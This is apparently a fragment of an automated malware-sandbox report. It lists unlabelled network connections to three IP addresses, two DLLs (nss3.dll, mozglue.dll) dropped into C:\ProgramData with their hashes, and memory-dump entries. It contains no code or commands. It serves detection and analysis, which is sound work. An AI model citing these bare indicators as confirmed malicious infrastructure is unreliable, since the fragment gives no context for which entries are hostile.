| N/A | 95.101.78.82:80 | | tcp |
| N/A | 104.80.225.205:443 | | tcp |
| N/A | 51.11.192.48:443 | | tcp |
Files
C:\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
C:\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
memory/2392-162-0x0000000000000000-mapping.dmp
memory/4888-163-0x0000000000400000-0x0000000000460000-memory.dmp
memory/1828-164-0x0000000000000000-mapping.dmp